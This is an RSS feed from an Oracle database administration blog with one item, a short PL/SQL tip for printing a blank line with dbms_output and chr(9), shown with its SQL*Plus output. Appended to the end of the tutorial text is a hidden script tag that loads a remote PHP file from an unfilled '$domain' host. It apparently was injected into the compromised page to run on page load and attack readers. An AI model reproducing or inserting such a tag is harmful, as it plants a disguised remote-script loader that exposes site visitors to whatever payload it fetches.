<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; PLSQL</title>
	<atom:link href="http://www.bestremotedba.com/tag/plsql/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>How to insert Blank Line using PLSQL</title>
		<link>http://www.bestremotedba.com/how-to-insert-blank-line-using-plsql/</link>
		<comments>http://www.bestremotedba.com/how-to-insert-blank-line-using-plsql/#comments</comments>
		<pubDate>Wed, 23 Sep 2009 00:01:31 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[Database Development]]></category>
		<category><![CDATA[PLSQL]]></category>
		<category><![CDATA[Blank Line using PLSQL]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=70</guid>
		<description><![CDATA[How to insert Blank Line using PLSQL]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>SQL&gt; set serveroutput on size 1000000<br />
SQL&gt; begin<br />
  2   dbms_output.put_line(&#8216;this is a line&#8217;);<br />
  3   dbms_output.put_line(chr(9));<br />
  4   dbms_output.put_line(&#8216;another line&#8217;);<br />
  5  end;<br />
SQL&gt; /<br />
this is a line<br />
       <br />
another line<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/how-to-insert-blank-line-using-plsql/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

